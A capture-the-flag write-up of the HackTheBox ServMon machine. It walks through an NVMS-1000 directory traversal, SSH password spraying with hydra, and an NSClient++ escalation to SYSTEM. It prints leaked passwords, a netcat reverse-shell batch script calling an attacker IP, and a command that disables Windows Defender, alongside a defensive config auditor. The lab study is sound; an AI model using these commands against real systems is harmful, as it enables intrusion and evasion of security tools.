No.2--HackTheBox--ServMon

HackTheBox-ServMon

Windows
Difficulty: easy
[https://app.hackthebox.com/machines/ServMon]


ServMon is an easy Windows machine featuring an HTTP server that hosts an instance of NVMS-1000 (Network Video Monitoring System). It is found to be vulnerable to LFI, which is used to read a password list on a user's desktop. With those credentials we can SSH into the server as a second user. As this low-privileged user, we can enumerate the system and find the password for NSClient++ (a system monitoring agent). After creating an SSH tunnel we can reach the NSClient web application, which includes functionality to create scripts that execute in the "NT AUTHORITY\SYSTEM" context. The user has permission to restart the "NSCP" service; after a malicious script is created, the service is restarted and the command runs as SYSTEM.


Steps

1. nmap scan

┌──(kali㉿kali)-[~]
└─$ nmap 10.129.246.65      
Nmap scan report for 10.129.246.65
Host is up (0.50s latency).
Not shown: 991 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5666/tcp open  nrpe
6699/tcp open  napster
8443/tcp open  https-alt

Nmap done: 1 IP address (1 host up) scanned in 72.91 seconds

First try port 80: it is the login page of a management interface, but we have no password. Next try FTP: anonymous login is allowed, and two useful files are found on the FTP server.

┌──(kali㉿kali)-[~]
└─$ ftp 10.129.246.65
Connected to 10.129.246.65.
220 Microsoft FTP Service
Name (10.129.246.65:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49685|)
125 Data connection already open; Transfer starting.
02-28-22  06:35PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49686|)
150 Opening ASCII mode data connection.
02-28-22  06:36PM       <DIR>          Nadine
02-28-22  06:37PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49687|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  168 Confidential.txt
226 Transfer complete.
ftp> ls /Users/Nathan
229 Entering Extended Passive Mode (|||49688|)
150 Opening ASCII mode data connection.
02-28-22  06:36PM                  182 Notes to do.txt
226 Transfer complete.

After downloading them with the get command we can see:

┌──(kali㉿kali)-[~]
└─$ cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine 

This tells us there is a Passwords.txt file on Nadine's desktop, and gives a clue: "Remove public access to NVMS" (not done yet).

┌──(kali㉿kali)-[~]
└─$ cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint                                                                                                   

From the earlier visit to port 80 we know the running service is NVMS-1000. Searching exploit-db finds an exploitable vulnerability, [TVT NVMS 1000 - Directory Traversal][https://www.exploit-db.com/exploits/48311]. Using Burp Suite's Repeater to exploit it, and the clue above to locate the password file:
Retrieve the passwords and save them to a file for later use:

┌──(kali㉿kali)-[~]
└─$ cat password.txt     
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Save the known usernames:

┌──(kali㉿kali)-[~]
└─$ cat usernames.txt
Nadine
Nathan
administrator

Password spraying (note: hydra takes a username list with -L, and the target is written as a URL):

hydra -L usernames.txt -P password.txt ssh://[target_ip]

This yields a valid username and password:

username:nadine
password:L1k3B1gBut7s@W0rk

After logging in via SSH, a non-default application is found in the Program Files folder: NSClient++

PS C:\Users\Nadine\Desktop> cd 'C:\Program Files\' 
PS C:\Program Files> ls 


    Directory: C:\Program Files


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         3/1/2022   1:20 AM                Common Files
d-----       11/11/2019   6:52 PM                internet explorer
d-----        2/28/2022   6:07 PM                MSBuild
d-----        2/28/2022   6:55 PM                NSClient++
d-----        2/28/2022   6:46 PM                NVMS-1000
d-----        2/28/2022   6:32 PM                OpenSSH-Win64
d-----        2/28/2022   6:07 PM                Reference Assemblies
d-----        2/28/2022   5:44 PM                VMware
d-r---       11/11/2019   6:52 PM                Windows Defender
d-----       11/11/2019   6:52 PM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:19 AM                Windows Mail
d-----       11/11/2019   6:52 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----       11/11/2019   6:52 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----        2/28/2022   6:25 PM                WindowsPowerShell

Searching exploit-db for NSClient++ gives an exploitable privilege escalation, [NSClient++ 0.5.2.35 - Privilege Escalation][https://www.exploit-db.com/exploits/46802]:

Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64

Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administrator's password in cleartext from the configuration file.  From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.  

The user is able to enable the modules to check external scripts and schedule those scripts to run.  There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere.  Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation.  A reboot, as far as I can tell, is required to reload and read the changes to the web config.  

Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.

Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
	C:\Program Files\NSClient++>nscp web -- password --display
	Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
	@echo off
	c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
	nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
	- foobar
		command = c:\temp\evil.bat

6. Add schedule to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
	- foobar
		interval = 1m
		command = foobar

7. Restart the computer and wait for the reverse shell on attacking machine
	nc -nlvvp 443
	listening on [any] 443 ...
	connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
	Microsoft Windows [Version 10.0.17134.753]
	(c) 2018 Microsoft Corporation. All rights reserved.

	C:\Program Files\NSClient++>whoami
	whoami
	nt authority\system
	
Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System

Following the exploit steps, we escalate privileges step by step:

1. Get the password from c:\program files\nsclient++\nsclient.ini: ew2x6SsGTxjRwXOT
2. Log in to the admin interface and enable CheckExternalScripts and Scheduler
3. Download nc.exe and the reverse-shell script evil.bat from the attacking machine

	@echo off
	c:\temp\nc.exe [your-ip] [your-port] -e cmd.exe

4. Start a listener

nc -nlvvp [your-port]

5. In the admin interface add evil.bat as the script foobar

- Settings > External Scripts > Scripts
- Add New
	- foobar
		command = c:\temp\evil.bat

6. In the admin interface add a schedule so the script runs automatically

- Settings > Scheduler > Schedules
- Add new
	- foobar
		interval = 1m
		command = foobar

7. Restart the system and wait for the reverse connection. NSClient++ configuration changes only take effect after a restart, so the system has to be rebooted.
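From the defender's side, the same chain can be checked for in the configuration file. The following is an added example (not from the original post or the NSClient++ project): it audits an nsclient.ini for the settings the escalation depends on, namely the web server password stored in the file, CheckExternalScripts and Scheduler both enabled, and a scheduled script living outside the install directory. Section names follow the NSClient++ ini layout; the sample file, the placeholder password and the trusted-path list are constructed assumptions.

```python
import configparser
import re

# Constructed sample in the NSClient++ ini layout (not the box's real file); the password is a placeholder.
SAMPLE_INI = """
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled
Scheduler = enabled
[/settings/default]
password = PLACEHOLDER_PASSWORD
[/settings/external scripts/scripts]
foobar = c:\\temp\\evil.bat
check_disk = scripts\\check_disk.bat
[/settings/scheduler/schedules/foobar]
interval = 1m
command = foobar
"""

# Assumption: the default install directory is the only place scripts may legitimately live.
TRUSTED_DIRS = (r"c:\program files\nsclient++",)
ABS_PATH = re.compile(r"^([a-z]:\\|\\\\)")  # drive-letter or UNC path

def _section(cp, name):
    return dict(cp[name]) if cp.has_section(name) else {}

def audit_nsclient_ini(text):
    """Return (code, detail) findings for the settings chained in the ServMon escalation."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep module names' case (CheckExternalScripts, Scheduler)
    cp.read_string(text)
    findings = []
    enabled = {m for m, v in _section(cp, "/modules").items() if v.strip().lower() == "enabled"}
    if "WEBServer" in enabled and _section(cp, "/settings/default").get("password"):
        findings.append(("CLEARTEXT_WEB_PASSWORD", "web admin password readable by anyone who can read nsclient.ini"))
    if {"CheckExternalScripts", "Scheduler"} <= enabled:
        findings.append(("SCRIPT_SCHEDULER_ENABLED", "scheduled external scripts run as SYSTEM"))
    untrusted = {}
    for name, cmd in _section(cp, "/settings/external scripts/scripts").items():
        exe = (cmd.split() or [""])[0].strip('"').lower()
        # relative paths resolve under the install dir; absolute ones must stay inside it
        if ABS_PATH.match(exe) and not exe.startswith(TRUSTED_DIRS):
            untrusted[name] = exe
            findings.append(("SCRIPT_OUTSIDE_INSTALL_DIR", f"{name} -> {exe}"))
    for sec in cp.sections():
        sched = _section(cp, sec) if sec.startswith("/settings/scheduler/schedules/") else {}
        if sched.get("command") in untrusted:
            findings.append(("SCHEDULED_UNTRUSTED_SCRIPT", f"{sec.rsplit('/', 1)[1]} runs {untrusted[sched['command']]} every {sched.get('interval', '?')}"))
    return findings
```

Run it against the live nsclient.ini together with an NTFS ACL check on that file; on ServMon the file was world-readable, which is what let a low-privileged user obtain the web password in the first place.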


Now we carry this out step by step:
From the earlier scan, an HTTP service also runs on port 8443. Scanning port 8443 again unfortunately gives no version information.

Assume the NSClient++ service is what runs on port 8443. The port cannot be reached directly from outside, but the SSH port can, so local port forwarding gives us access to it:

ssh -L 8443:localhost:8443 nadine@[target-ip]

Open localhost:8443 in a browser; after a long wait the NSClient++ admin interface appears. Log in with the password found earlier and work through the exploit step by step.
A problem comes up when uploading nc.exe: the system deletes it immediately. This is Windows Defender's real-time monitoring, which has to be turned off manually. Try:

powershell Set-MpPreference -DisableRealtimeMonitoring $true

This fails for lack of permissions: it requires NT AUTHORITY\SYSTEM or administrator rights.
So save the command that disables real-time monitoring as a script, poiint.bat, and call it through NSClient++'s external script feature. NSClient++ runs poiint.bat as SYSTEM, and real-time protection is disabled successfully.
After adding the script, reload.
Navigate to Settings -> External Scripts -> Scripts.
Click run to disable AV real-time monitoring.
Next, back up poiint.bat and then simply rename the reverse-shell script to poiint.bat so that it gets executed instead:

PS C:\Temp> mkdir backup


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/17/2023   4:15 AM                backup


PS C:\Temp> move .\poiint.bat .\backup\
PS C:\Temp> ls


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/17/2023   4:15 AM                backup
-a----       12/17/2023   3:59 AM             52 evil.bat
-a----       12/17/2023   3:58 AM          59392 nc.exe


PS C:\Temp> move .\evil.bat poiint.bat
PS C:\Temp> ls


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/17/2023   4:15 AM                backup
-a----       12/17/2023   3:58 AM          59392 nc.exe
-a----       12/17/2023   3:59 AM             52 poiint.bat

Start the listener:

nc -lvnp [your-port]

We get a reverse shell!
And find the flag!
